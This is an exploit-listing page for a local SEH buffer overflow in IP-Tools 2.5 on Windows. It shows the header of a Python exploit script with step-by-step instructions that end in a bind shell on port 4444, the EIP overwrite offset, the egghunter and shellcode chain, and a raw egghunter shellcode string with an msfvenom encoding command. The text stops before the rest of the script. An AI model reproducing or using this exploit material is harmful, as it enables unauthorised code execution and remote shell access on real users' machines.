Iptools 2.5 log to file local buffer overflow (seh) (egghunter) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-02-11 |
Type : local |
Platform : windows
This exploit / vulnerability Iptools 2.5 log to file local buffer overflow (seh) (egghunter) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/env python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) #
# Date: 2019-02-06 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe #
# Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe #
# Version: 2.5 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > #
# "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 #
#------------------------------------------------------------------------------------------------------------------------------------#
# Good Characers: alphanumeric and printable special characters #
# EIP Offset Overwrite ("Log to file" field): 264 #
# Non-Participating Modules: ip_tools.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> #
# Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#
#encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode proceeded by xor edx,edx (start egg hunting at 0x00000000)
#echo -ne "\x33\xd2\x31\xdb\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58\x33\xc9\x8b\xd4\x64\xff\x13\x5e\x5a\x3c\x05\x74\xe9\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p -
#150 bytes